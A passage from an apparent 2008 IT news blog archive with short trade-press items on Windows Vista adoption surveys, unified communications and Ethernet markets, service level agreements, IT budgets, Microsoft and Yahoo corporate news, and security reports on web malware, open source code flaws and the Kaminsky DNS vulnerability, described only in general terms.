The report added that Vista adoption in the enterprise "appears falling short of planned deployment," based on the group's previous research.

In any case, many developers seem to have caught up with making their applications compatible with Vista since its initial release. Veghte said at the Financial Analyst Meeting that more than 250 commercial applications are now compatible with Vista.

Forrester's enterprise desktop Windows OS adoption numbers appear to track well with data collected by KACE, a maker of a systems management appliance that lets users share OS use information. An informal KACE poll found that 85 percent of its enterprise respondents used Windows XP.

Forrester's study polled "more than 50,000 users at more than 2,300 large to very large enterprises." It also examined browser use, Java and Flash adoption and matters such as screen resolution and color depth. The report can be accessed here.

Survey: Vista Adoption Weakens, as IT Pros Eye Apple
Forrester: Vista rejected like ‘new Coke’ by enterprises
The Perfect Desktop - OpenSUSE 11 (GNOME)

Friday, July 25, 2008

The Gold-Laying UC Egg

You've probably heard Cisco Systems Inc., Microsoft Corp., and others making a lot of noise, recently, about unified communications (UC).

There's a reason for that, experts say: There are profits to be had in UC. The market itself grew by 20 percent in both 2007 and 2006, according to market-watcher Infonetics Research.

On a related note, the IP contact center (IPCC) segment also surged in both years, growing by an average of 25 percent in 2006 and 2007. Predictable expansion of this kind is a gold-laying-goose that Cisco, Microsoft and others just can't ignore.

What's more, according to Infonetics, UC and IPCC sales eclipsed the $1.05 billion mark in 2007, with "healthy growth" projected through at least 2011.

"As a key component of unified communications, sales of communicator software clients are taking off. The Nortel/Microsoft alliance drove growth in 2007, and Microsoft captured close to half the communicator market," said Matthias Machowinski, Infonetics Research's directing analyst for enterprise voice and data, in a statement. "Market share will likely bounce around in the coming years, as vendors from different backgrounds try to establish themselves as the leader in the nascent UC market and promote their offerings aggressively."

Infonetics' research paints a picture of an UC and IPCC free-for-all. Microsoft, for example, recently unveiled its own UC entries -- and promptly catapulted to first place in communicator revenue market share last year.

Unified messaging, meanwhile, is a more stolid segment: It accounts for the bulk of the UC market entire and, at this point, it's led by Avaya, which accounts for about one-third of unified messaging revenues.

Avaya is flat-out dominant in the IPCC market, where it accounts for more than half of worldwide revenues, according to Infonetics; Cisco is second in this segment, the market watcher said.

PSN hits one million accounts in Japan
Unisys Offers Free Unified Communications Trial

Service Level Agreements Too IT-Centric, Forrester Report Warns

Service level agreements (SLAs) are a popular tool for measuring how well IT is providing service to its customers, the organization's business users.

A new Forrester Consulting report based on a survey of 389 global technology decision-makers who work with service management finds serious deficiencies with current SLAs. The study sheds light on how SLAs are currently being used, the degree of end-user dissatisfaction, and what IT can do to correct the problem.

At the heart of the matter is the IT-centric nature of the service level metrics, most of which have little or no relevance to business end users.

[T]here is one important question that IT executives should consider in these projects: Whose services are we talking about? Do people -- especially colleagues on the business side -- really care about how well IT performs their IT processes, such as fixing incidents, making configuration changes, and provisioning server environments? Isn't it much more relevant to discuss and measure the performance of the services that the business cares about -- such as processing orders, dealing with customers, and making and shipping products?

The report, Managing IT Services From The Outside In, commissioned by Compuware Corporation, explores the effectiveness of an organization's processes as well as what technologies they use. The survey asked about service management processes, how content for service-level agreements is developed, and how service quality is measured.

Although 81 percent of respondents are involved with formal SLAs, they meet those expectations only three quarters (74 percent) of the time. "The major reason cited for failure to meet the agreed-upon service levels was that 'The business had higher expectations than we could meet.'" Forrester says this is a "clear demonstration of poor business and IT alignment."

The majority of respondents use IT-centric metrics (including network and server availability, number of incidents, and number of failed transactions). Of the 321 respondents using SLAs, 56 percent establish a fresh metrics baseline and 33 percent use the previous year's performance at a guide. The baseline often involves only IT personnel.

Business users understand that these measures may be needed by IT, but Forrester points out that systems and networks are "extremely reliable" and "managing the applications portfolio is becoming increasingly complex with end users, inside and outside the enterprise, [as is] running their apps on different devices and over different networks."

Communication Is Key
Communication and coordination between IT and business users are two areas Forrester says IT must examine; 41 percent of the respondents don't even "collect the right service quality data together for their IT and business executives, so they do not even attempt to provide these reports at all," the report notes.

Poor communications may also explain why SLAs may not be "agreements" at all.

They are not negotiated with the business partner because there is no dialogue process and because the business does not understand terms like "percentage availability" or "amount of storage." So when reviewing the IT service at the end of a budget period, business managers can say, "It was not good enough for me to do my business," even if the IT service levels were met on a mathematical basis from the IT point of view.

Forrester reports that the focus of metrics will move from IT to the business as communication increases between the two groups.

The survey found that although 87 percent of the respondents said they use tools to monitor the end-user experience (EUE) for some their business-critical apps, nearly two-thirds (64 percent) acknowledge that they learn about problems only when users contact the help desk.

There's no question about the impact of poor application performance: 57 percent say it increases business costs. Lost revenue and negative impacts to the satisfaction of external customers were each cited by 48 percent. Even so, not all organizations are using SLAs or believe they're needed at all. The study reports that 17 percent of respondents don't have formal SLAs, and half of these acknowledge the need but have not instituted a formal SLA program, and 37 percent of these respondents said "the business hadn't asked for SLAs." Nearly a quarter (24 percent) said SLAs were "overkill."

Two movements are affecting IT, according to Forrester. IT service management (ITSM) "supports the change of an IT organization from a support group into a service group." ITSM includes introducing ITIL or reorganizing IT operations into process groups (instead of tech silos), as well as "the introduction of account management, and even marketing concepts within the IT organization." ITSM is inward-looking and only indicates "how well the IT shop is being run." It does not address the need to know how the business is being run from the perspective of the business unit and the end user.

Business Service Management (BSM) looks at a different set of metrics, including the business transaction volume, transaction speed, and the processing backlog volume.

Report Recommendations
IT operations must establish business-centric SLA metrics, and to do that, IT must "understand their services from the outside in." Forrester recommends IT:

...spend time with business users and understand how they, the users, perceive the service and document what is important for business success or failure. Companies in this phase of service management usually focus on the quality of service around business applications. They need to analyze and document the dependencies between business applications and the details of IT infrastructure in order to better triage incidents or understand true business impact of pending performance or capacity issues.

Communication is key. The report also claims that many SLA reports lack information relevant to executives; 40 percent of survey respondents agreed. Forty-one percent of respondents said they don't provide regular reports to executives.

The report also strongly suggests that leveraging ITIL best practices should be the first methodology chosen because it specifically addresses IT processes. "ITIL is best for documenting and standardizing the IT processes themselves." It notes that quality-improvements programs (including Six Sigma) can help IT improve its processes. Together, the two methodologies provide "a powerful combination for continual IT service improvement."

Failure for IT to change its approach to SLAs may have serious consequences. The study notes that "IT organizations that consider their service management projects only at the IT service level will continue to disappoint their business users in the longer term, and the age-old CIO problem of being equipped to demonstrate value to the business will prevail."

iPhone multimedia lead advances, research claims
IT Cost Cuts in 2008 May Be a Trend, Study Says
80% of businesses have at least one Mac
Survey: Vista Adoption Weakens, as IT Pros Eye Apple

Most Malware Found on Trusted Web Pages, Report Says

Five seconds into reading this story, a Web page somewhere will become infected with malware or some other malicious code. That's one of the conclusions of U.K.-based IT security firm Sophos in an IT security report released on Wednesday.

"We found that there is an average of 16,173 infected Web pages on a daily basis," said Sophos' Senior Technology Consultant Graham Cluley in a phone interview from his office in London. "We arrived at this conclusion from our labs around the world. We look at millions of e-mails and Web page transmissions on a daily basis and it averages out to one infected page every five seconds."

The threat report covers the first six months of this year and according to Cluley and the report itself, the page infections are occurring at a rate three times faster than the comparable period in 2007.

The report identified the Windows OS as the largest target for malware. It also found that 90 percent of infected Web pages derived from trusted sites such as Facebook and LinkedIn, as well as other oft-visited destinations.

The report pegged the do-it-yourself blogging portal as the top host for malware on the World Wide Web, with an estimated two percent of the malicious software being incubated and launched on that site alone. The study also mentioned the astronomical rise of spam on mobile devices in places such as China, where such junk mail messages grew to almost 354 billion in 2007.

The one major security theme in the report was the recent rise in SQL injection attacks that exploit security vulnerabilities in application code linked to a back-end database. These attacks can provide an entrance for hackers, allowing them to elevate their network privileges and change data fields.

"What we've seen with these attacks is that even if you clean up the database and get rid of the virus there, it could either be just a decoy for another injection attack or another virus will come along soon," Cluley said.

At risk are traditional brick-and-mortar companies that have decided to foster an increased presence on the Web. Their e-commerce platforms could be vulnerable to manipulation by hackers, the report stresses. In addition to applying security patches, some enterprises should have a "security lock box" or Web appliance as a buffer between the end user and the enterprises' infrastructure.

The lessons particularly apply to small and mid-size companies.

"Hackers have by and large stopped using e-mail as an entry point and instead decided to frame their attacks in and around the Web browser," Cluley further warned. "Big companies may have the infrastructure and the money to act, but the real necessity here is for small and medium sized businesses to reassess Internet security. This is clearly an opportunity for channel partners as well as enterprises themselves to collaborate and get involved, whether it's a consultant for the business or an internal mandate."

Increasing Number Of U.S. Residents Delay, Forgo Needed Health Care Because Of Cost Concerns, According To Report
Microsoft Advisory Targets SQL Injection Attacks
PC Tools launch iAntiVirus beta
Government, Health Care Web Sites Attacked

Thursday, July 24, 2008

Microsoft Revamps Its Platforms Division, Loses Kevin Johnson

Microsoft on late Wednesday announced a reorganization of its Platforms & Services Division (PSD), as well as the departure of Kevin Johnson, a 16-year Microsoft veteran and president of the PSD.

The company plans to split the PSD into two groups: "Windows/Windows Live" and "Online Services." Those groups will report to Microsoft's CEO Steve Ballmer, according to an announcement issued by the company. Ballmer has appointed Senior Vice Presidents Jon DeVaan, Steven Sinofsky and Bill Veghte to lead the Windows/Windows Live group, "effective immediately."

Microsoft also plans to establish "a new senior lead position" in the Online Services Division and is currently searching for a candidate for the job.

Johnson will be leaving to become the CEO of Juniper Networks, according to the Wall Street Journal.

Johnson had overseen Microsoft's Windows and Online Services businesses, the latter of which centered on Live Search, and Windows Live. He also had been involved in the company's overall strategy, reporting to Ballmer.

In early June, Johnson declared he would fix the rebranding of Microsoft's Live Search, with the aim of increasing Microsoft's competition with No. 1 online search player Google. That renewed focus on Microsoft's "organic" search development came after an unsolicited bid to acquire No. 2 Internet search firm Yahoo failed to materialize in April.

Johnson was also involved with Microsoft's software plus services strategy, in which he oversaw 30 acquisitions. The biggest of those was a $6 billion acquisition of aQuantive Inc., boosting Microsoft's digital advertising technologies.

Johnson also had a hand in overseeing the Windows Vista operating system launch, in which more than 180 million copies have been sold, according to Microsoft's fiscal fourth-quarter report, released on July 17.

Microsoft's 4Q report showed that its Online Services Division had a $1.23 billion operating loss for the fiscal year, which was largely associated with its competitive efforts to catch up with Google in online search advertising business.

Microsoft has defended its expenditures in search, with Chris Liddell, Microsoft's senior vice president and chief financial officer, saying the expenditures are necessary to address a market "measured in the tens of billions of dollars."

Google search share climbs
Yang, Ballmer Go Golfing; Merger No Longer a Priority
Live Mesh Preview: It’s Wait-List Only

Companies Ditch ATM, Frame Relay -- Finally

Out with the old (frame relay, ATM and subscriber lines) and in with the new (e.g., Ethernet or IP MPLS VPN services). That's the latest trend in enterprise networking, according to market watcher Infonetics Research.

The upshot, Infonetics said, is that after years of talking about eight-sixing their legacy frame relay assets, organizations are finally doing it.

Worldwide Ethernet service revenues grew by fully one-third (33 percent) to $12.5 billion last year, while IP MPLS VPN revenues increased by one-fifth (20 percent), reaching $13 billion. That's just the beginning, according to Infonetics, which projected strong growth through 2011.

"Customer demand and IP and next-gen network...transformation projects are the two main factors contributing to the growing popularity of Ethernet and IP MPLS VPN services," said Michael Howard, Infonetics principal analyst, in a statement. "Companies like these services because they offer considerably more bandwidth with little or no increased WAN costs compared to their legacy counterparts" like frame relay, ATM, or private lines.

"Customers expect -- and get -- a better per-bit cost for Ethernet services. And service providers like them because they help bring in new revenue, so requests for Ethernet and IP MPLS VPN services are coming from both sides."

Not surprisingly, Ethernet's value proposition is hard to beat. Prices vary considerably, Infonetics conceded, but -- in North America, at least -- 100M Ethernet clocks in at about $50 per Mbps (for 100M Ethernet), while DS3 or SONET costs more than three times as much ($180 per Mbps).

Last year, 80 percent of Ethernet service revenues stemmed from retail sales, according to Infonetics, a trend that will continue through 2011: All sources of retail Ethernet service revenue -- including Internet/WAN, Ethernet private line and transparent LAN -- will increase. Over the same period, Infonetics predicted, transparent LAN services will notch the fastest overall growth.

Apple posts regional, product sales figures for Q3
Cloud Computing To Bring Security App Shift, Report Says

Survey: Vista Adoption Weakens, as IT Pros Eye Apple

A KACE-sponsored survey on Windows Vista adoption represents more bad news for Microsoft's flagship operating system, even as Microsoft prepares to pour an estimated $300 million into a new Vista marketing campaign -- news that was announced at Microsoft's 2008 Worldwide Partner Conference.

The survey polled 1,162 IT professionals in June and was conducted by King Research for KACE, which makes a hardware-based systems management product for IT administrators. The company's KBOX product is also available as a plug-in to VMware's virtualized stack.

This latest survey represents a second go-round for KACE, which sponsored an initial survey published in November of 2007. The 2008 survey used the same database source as the survey conducted last year, as well as much of the same questions.

This survey found a slip in Windows Vista deployment plans, with 60 percent of respondents saying that they had "no plans to deploy Vista at this time," compared with 53 percent in the 2007 survey.

The respondents also appeared to reject the "common wisdom" that people were simply waiting for Service Pack 1 to deploy Vista, with the idea that initial bugs and incompatibilities would be worked out by then. A solid 92 percent of survey respondents said that "Vista Service Pack 1 has not changed their plans for Vista deployment."

Concerns about deploying Vista, pegged at 90 percent in the 2007 survey, dropped to 82 percent in this survey. However, the apparent increased confidence in Vista wasn't matched by deployment trends as 47 percent of respondents said they had "not deployed Vista in any way" compared with 48 percent in last year's survey.

"Windows 7," the code-name for Microsoft's newest OS expected to appear in the 2009 to 2010 time frame, hadn't affected the majority (51 percent) of the respondents' deployment plans. However 14 percent of respondents planned to skip Vista for Windows 7, while another 14 percent had decided to delay their Vista deployment plans while considering additional details about Windows 7.

Some respondents (42 percent) said they were considering alternative operating systems to Windows Vista. The Macintosh operating system was the favored alternative by 29 percent of respondents. Linux-based operating systems were also in the running, but trailed. More IT professionals reported challenges managing non-Windows operating systems in this survey, with 65 percent citing a need for expertise vs. 49 percent in 2007.

Despite those troubles, Rob Meinhardt, cofounder and CEO of KACE, believes that IT is moving more toward managing a heterogeneous desktop environment, even to the point of giving employees their choice of computer to use.

"I don't think in the future you are going to see homogeneity on the Windows front anymore," Meinhardt said. "You are going to see people running XP side-by-side with Vista. Now that's also true of cross-platform to non-Windows platforms. You are going to see more companies running Windows Vista, Windows 7, Windows XP side-by-side with Macintosh."

KACE is a case in point, since about 50 percent of its computers are Macs, Meinhardt explained. KACE's "bias" in sponsoring the survey is that it advocates the use of its KBOX product to help IT administrators manage such heterogeneous environments. The product competes with Microsoft's Systems Management Server, which can only handle Windows environments, according to Meinhardt.

The survey results are one thing, but KACE also has an alternative method for estimating OS adoption. KACE customers can opt-in to a survey through the company's KBOX management product and share what operating systems they use. Meinhardt says that option has created "several hundred thousands of data points" on OS use.

"At the very high level, XP represent 85 percent of that pool," he said of this alternative KACE poll. "Vista is at about one percent, and Macintosh is at about four percent." Meinhardt concluded that "there is relatively low Vista adoption in the enterprise and indeed Apple is actually ahead of Vista in these businesses."

Those interested in seeing the full results of KACE's June 2008 survey can get a free copy (PDF) here.

Run Linux in Windows
80% of businesses have at least one Mac
Microsoft Offers Vista Support to Small Businesses

Wednesday, July 23, 2008

IT Cost Cuts in 2008 May Be a Trend, Study Says

A first-quarter 2008 survey conducted by Computer Economics suggests a possible slowdown in IT spending and staffing lies ahead.

The group's analysis found that the growth rate in the median IT operational budget was four percent among its 2008 survey participants. That figure represents a decline from the five percent growth rate measured in 2007.

The four percent increase in IT budgets for this year "may prove to be optimistic," according to the report, because one in four IT executives say they don't plan to spend all of the money in their budgets.

The top priority for IT organizations in 2008 was "to improve IT service levels." In contrast, the 2007 response was "developing new systems." The report interprets this shift to indicate "a general softening in the focus on new systems and tighter attention on cost control."

The other top priorities for IT organizations in 2008 included risk management and disaster recovery, security, and lowering IT maintenance and support costs.

The report, "IT Spending, Staffing & Technology Trends 2008/2009," said it found indications of "a decidedly cautious mood among our survey respondents this year, in contrast to the optimistic tone in last year's survey."

IT spending per user was $6,667, representing a decline from $7,397 in 2007. The report's analysis suggests that this decrease in spending means that IT management is finding a way to get along with less.

"In other words, in today's weak economic conditions, IT managers are showing their ability to support an increasing number of users without corresponding increases in IT spending," the report states.

In terms of long-term capital IT spending, the report sees a drawback. The median IT capital spending for 2008 was flat, whereas it constituted a four percent growth rate in 2007.

Does all of this mean less hiring or layoffs? The report found that prospect to be a mixed bag, with 39 percent of respondents saying they are adding staff, 37 percent indicating no change in staffing and 24 percent planning to cut staff. However, outsourcing is on the rise among companies of all sizes, the report indicates. Respondents in organizations that have outsourced their software development work say they plan to increase outsourcing by 15 percent.

Computer Economics' survey was conducted from January to April, 2008. Respondents were IT staff knowledgeable about spending and staffing in the United States and Canada. Participants included "201 CIOs and senior IT management" in large, medium and small companies.

For access to the report or a free executive summary, go here.

Partners: An ‘Essential’ Element in Microsoft’s SMB Plans
Long-term care costs higher in Florida
Total Insured Value of Properties in Hurricane Prone States on Pace to Double in 10 Years
Compliance, New Threats Drive Security Spending

Open Source Needs Better Security Focus, Study Says

The open source software community lags behind the commercial software sector in secure code development, according to a recent study of some commonly used open source packages.

Fortify Software Inc., of San Mateo, Calif., examined 16 applications and found that vulnerabilities often were not fixed in new releases and, in some cases, the number of vulnerabilities actually increased.

In examining the organizations maintaining the applications, the study found a lack of dedicated security experts and secure coding standards, and a focus on functionality rather than security and risk mitigation.

The issues are significant because enterprises are increasingly adopting open source software. Users could be exposed to unnecessary security risks if they are not closely examining the code in their applications, the study warned. Fortify conducted the study because of the number of its banking-industry clients who were reviewing and, in many cases, rebuilding open source applications.

"Government and commercial organizations that leverage open source should follow the example of the financial services industry and use open source applications with great caution," the study stated.

It also recommended that open source communities adopt the robust security practices many of their commercial counterparts now use.

Although far from perfect, "in general, the commercial side is slightly ahead" in secure software development, said Rob Rachwald, Fortify's director of product marketing.

Open source software has a more transparent development process in which source code is available to users, who can examine, use and modify it as they wish. The process seeks to produce more functional, adaptive applications without hidden features and allows a broad community to identify flaws. But many vulnerabilities go unrecognized or, if recognized, go unfixed over several generations of software.

"Only one of the packages surveyed showed a net decline in vulnerabilities over three generations of releases," the study stated.

Fortify used its static code analysis tool to examine two to four versions of each Java-based open source application. Analysts manually verified any major security issues the tool discovered.

The applications studied were:

Cayenne, an object-relational mapping tool. Hibernate, an object-relational mapping tool. Derby, an application server. Geronimo, an application server. Hipergate, a Web-based customer relationship management application. JBoss, an application server. Jonas, an application server. Jbopen source, an application server. Ofbiz, a Web-based CRM application. OpenJMS, a Java Message Service solution. OpenCMS, a content management tool. Resin, an application server. Shale, JSF Web framework. Struts, a Web application. Tomcat, a servlet engine. Webharvest, a Web crawler.

The study found a total of 44,233 vulnerabilities in the 4.25 million lines of code examined. Hipergate 3.0.26 topped the list with 14,425 vulnerabilities in about 81,000 lines of code. The two most common vulnerabilities overall were cross-site scripting, with 22,828, and SQL injection, with 15,612.

Fortify made details of the vulnerabilities available to the applications' development teams but did not include them in the public report.

The company recommended that security be integrated into the development process, with someone assigned that role. So far, that approach is the exception rather than the rule.

"We see promising signs," the study stated. "In July 2008, Mozilla announced a security initiative to improve the browser's security, hiring independent security consultant Rich Mogul as an adviser."

The report recommended that other teams follow Mozilla's lead.

Open source DNS server takes on BIND
Oracle Releases Critical Updates
GLSA 200806-07 X.Org X server: Multiple vulnerabilities

DNS Flaw Unfixed as Experts Argue Protocol

Speculation continues as to what the ultimate systemic Domain Name System (DNS) flaw could be. This flaw apparently allows Web surfers to be spoofed, directing them to fake Web sites to gain passwords and load malware on their computers.

The flaw was first revealed by Dan Kaminsky, a researcher at security firm IOActive Inc., although Kaminsky largely withheld the technical details of the exploit.

In a Friday morning press conference, Kaminsky said that many of the patches released by various IT vendors and security firms reacting to his bug discovery (reported by CNet are at best temporary fixes to a more pervasive problem. Kaminsky added that he would be disclosing further findings at the Black Hat security conference in Las Vegas next month.

Kaminski argued that there should be a blackout date on discourse and research about the vulnerability until then. In contrast, IT security gadfly Halvar Flake, who is also CEO and head of research at Sabre Security, outlined a hypothesis for the DNS flaw in his blog and disagreed with the blackout.

"Let's assume that the DNS problem is sufficiently complicated that an average person that has some background in security, but little idea of protocols or DNS, would take N days to figure out what is problem is. So clearly, the assumption behind the 'discussion blackout' is that no evil person will figure it out before the end of the N days [blackout]," Flake wrote.

Flake's proposed method of finding the vulnerability came about when he ran tests that involved sending spoofed protocol transfer requests to a nameserver, a gate-keeping function for IP language, which converts text domain names into numeric IP addresses. Through this process, an attacker sets up a Web page with tags that are routed to a corrupt nameserver. When a user visits that Web page, the browser may be fooled into associating a legitimate name server with the page.

The DNS vector should be considered a pervasive threat to enterprise systems.

The U.S. Computer Emergency Readiness Team, about two weeks ago -- around the time of Kaminsky's initial announcement -- issued an advisory describing the issue. It listed more than 80 vendors whose products are affected by the vulnerability, including names like Microsoft, Cisco Systems, Sun Microsystems Inc. and Red Hat, among others.

Having a reliable DNS cache exploit in place increases the probability that a hacker can redirect an unsuspecting Web surfer to a malicious Web site, an attack called "phishing."

"Phishing attacks were already on the rise against the increasing number of hosted enterprises services," said Andrew Storms, director of security at San Francisco-based IT security firm nCircle. "I don't think we've seen the last of these problems. The temporary solutions are to immediately patch your system in the meantime because the risk to corporate networks is one of the more serious risks enterprises face."

New Alpha Protocol Screenshots
Massive Patch Coming for DNS Vulnerability

Tuesday, July 22, 2008

Power Pack 1 Unveiled for Windows Home Server

Microsoft has released to manufacturing its Windows Home Server Power Pack 1 update, which adds additional product support plus a fix for an infamous bug that has plagued Microsoft's consumer server offering since December.

The bug in question, described in knowledgebase article 946676, affected systems using more than one hard disk, causing files saved with the NTFS file system to become corrupted when saved via Windows Home Server (WHS). The problem was associated mostly with Microsoft applications -- a rather embarrassing problem, since WHS is designed, in part, to back up data on a home network.

Power Pack 1 adds support for Windows Vista x64-based PCs, according to Microsoft's announcement. Microsoft has also improved WHS's performance and power consumption with Power Pack 1. The update also enables backups of shared folders and adds improvements to WHS's remote access capabilities.

Microsoft released the English version of Power Pack 1, which is available now here via the Microsoft Download Center. The English version will also be available through Windows Update on August 4, according to the We Got Served blog.

Chinese and Japanese versions of Power Pack 1 will be released to manufacturing sometime in August, according to Microsoft's announcement. French, German and Spanish editions will be available via the Microsoft Download Center on August 4, says the We Got Served blog.

Power Pack 1 can't be used with the beta or release candidate versions of WHS. You have to remove the beta version before applying Power Pack 1, according to Microsoft's description of Power Pack 1.

Some folder and database files are not designed to be used on WHS, according to the We Got Served blog, which points to knowledgebase article 955690 on the topic. Those files include Outlook .pst files, which some use to copy e-mail messages to local computer. The files are unsupported on a local area network and so Microsoft recommends not storing them on WHS.

Also, some database files, such as those used in Intuit's Quicken finance program, were designed for use on a single computer. Microsoft's knowledge base says that these kinds of files can get corrupted if stored on WHS.

Microsoft offers a technical brief on backup and restore using WHS, which can be accessed here. There also an explanation on using WHS's remote access capabilities, which can be accessed here.

Microsoft also offers a software developer kit, API reference and developer's guide for WHS, which can be accessed here.

Microsoft Talks Windows 7 … But Doesn’t Say Anything
Ubuntu 8.04 LTS vs. Windows XP SP3: Application Performance Benchmark
Partners: An ‘Essential’ Element in Microsoft’s SMB Plans
Run Linux in Windows

Yahoo Ends Proxy Fight With Icahn

Yahoo partly acceded to the demands of corporate raider Carl Icahn by agreeing to seat Icahn and two of his proxy-slate candidates to Yahoo's board. The about-face move by Yahoo is a surprising turn in the ongoing harsh wooing of the company, which began in January with an unsolicited acquisition proposal from Microsoft.

Icahn, who holds about 5 percent of Yahoo's stock, got involved late in the process, trying to broker a deal between Yahoo's and Microsoft's management teams. Only a week ago, Icahn's efforts drew sharp denunciations from Yahoo's management. Roy Bostock, Yahoo's chairman, called the alliance of Microsoft and Icahn "odd and opportunistic," and rejected a new Icahn-brokered Microsoft offer to buy Yahoo's search business as bad for shareholders.

Icahn could have challenged the whole of Yahoo's board -- all of whom are up for election. However, this latest deal just adds two of Icahn candidates to the board: Jonathan Miller, a Velocity Interactive Group partner and former AOL chairman and CEO, plus one other candidate from the nine recommended by Icahn. Those two candidates will be seated on the board "upon the recommendation of the Board's Nominating and Governance Committee," according to an announcement issued by Yahoo.

In addition, the board membership will be expanded to 11 members and eight members of the current board will be up for election. A current board member, Robert Kotick, Activision Blizzard's CEO, will not stand for reelection. Yahoo's shareholders are scheduled to elect the board at Yahoo's Aug. 1 shareholders' meeting.

Yahoo's accommodation of Icahn comes just four days after Bostock and Yahoo's CEO Jerry Yang wrote a letter to stockholders calling Icahn "a corporate agitator with a short-term approach to his investments."

The letter also said Icahn had no plan for the company and that "Icahn and his slate lack the working knowledge of Yahoo!"

Icahn had originally supported Yahoo's current plan, to reject the sale to Microsoft and enact a search-ad deal with Google, according to the letter. However, Icahn then did "an extraordinary flip flop" and teamed with Microsoft on a "search-only proposal," the letter claimed.

Icahn has rejected the criticism of his fumbled deal proposal in which "we were willing to discuss keeping a number of the current board members and Jerry Yang as Chief Yahoo!," Icahn wrote in a letter to Yahoo's shareholders.

Microsoft originally offered to buy all of Yahoo -- a deal that company officials called off in late April over a price dispute. Now Microsoft just wants to buy Yahoo's search business to bolster its third-place ranking in search, where it badly trails Google and Yahoo.

Microsoft's latest proposal to buy Yahoo's search-ad business was disclosed in detail on July 18 by Chris Liddell, Microsoft's senior vice president and chief financial officer, in Microsoft's fiscal fourth-quarter report. Liddell described a complex formula in which "Microsoft proposed a 10-year minimum revenue guarantee totaling between $19.5 and $26.5 billion dollars." He also promised "no changes to Yahoo's governance."

So far, there has been no public reaction from Yahoo on Liddell's proposal.

Yahoo letter to shareholders slams Microsoft, Icahn
Icahn and I Will: Investor Launches Yahoo! Proxy Battle

Compliance, New Threats Drive Security Spending

Pity U.S. IT organizations. Not only must they grapple with rising regulatory and compliance costs, but many are coming to grips with another rising cost: security. Enterprise security is an expensive proposition, one that's likely to get even more expensive as organizations take further steps to protect themselves.

The good news, according to a new survey from security software vendor CA Inc., is that all of that money seems to have been well-spent.

CA's latest Security and Identity Access Management (IAM) Survey found an overall decrease in the number of organizations that reported virus, network and denial of service (DoS) attacks last year.

What's more, CA indicated, almost 15 percent of shops said they hadn't experienced (known) attacks of any kind. That's up from 11 percent in 2006.

That figure includes virus outbreaks. Last year, almost 60 percent of enterprises grappled with virus attacks, down from almost 70 percent in 2006. Meanwhile, just 40 percent of U.S. enterprises battled network attacks last year; that's down from half of all shops in 2006.

DoS attacks appear to be on the wane; just over a quarter (26 percent) of organizations were victims of DoS activity in 2007, CA said. That's a steep decline from 2006's tally of 40 percent.

Even as IT organizations have clamped down on traditional attack vectors, they're increasingly coming to grips with another line of attack: breaches from within.

According to CA, the percentage of survey respondents who experienced internal security breaches increased slightly from its 2006 survey, climbing to 44 percent in 2007 (an uptick of 2 percentage points). That's a sharp spike from half-a-decade ago, when less than one-sixth of IT organizations experienced an internal breach.

"The increase of internal threat also appears to be making it more difficult for organizations to successfully manage and contain the costs associated with security attacks/breaches," the CA survey said.

Serious Breaches
The numbers paint a grim picture. In 2007, more than a third of organizations reported losing confidential customer or transactional data as a result of security breaches; that compares with just 22 percent two years ago.

What's more, internal breaches have disastrous real-world consequences, in terms of both costs and irate customers. According to the CA survey, one-third of organizations say they suffered reduced customer satisfaction as a result of breach or attack, while almost two-thirds (61 percent) experienced diminished productivity. This, of course, plays to one of CA's product categories: IAM.

"U.S. businesses and governments recognize it doesn't take much to shake consumer confidence, and they recognize the need to do all they can to assure consumers and constituents," said Lina Liberti, vice president, CA Security Management, in a statement. "As the growth of security threats change from external attacks [such as] distributed denial of service to the insider threat, businesses are turning to identity and access management solutions to combat that internal threat. This survey indicated that the number of organizations planning to roll out identity and access management solutions in the next 12 to 18 months increased 11 [percentage points], moving from 49 percent in 2006 to 60 percent in 2008."

Increasingly, a majority of organizations are devoting the bulk of their IT spending to security compliance. In 2007, for example, four-fifths of survey respondents reporting spending 10 percent or more of their IT budgets on security compliance, while more than half (56 percent) said that their firms spend 20 percent or more of their IT dollars on security compliance.

Over time, security budgets will gobble up an ever-larger share of overall IT spending, according to CA officials.

"The survey points to an increase in the severity of consequences of internal breaches. The implications are now tied squarely to dollars and reputation," Liberti said. "The potential aftershocks of an internal breach [have] the attention of both the business and IT, and for enterprise organizations the priority has now shifted from reactive to proactive security strategies to deal with this threat."

Apple ships massive Mac OS X 10.4 security upgrade
PC Tools launch iAntiVirus beta
Data Breaches Up in First Half of 2008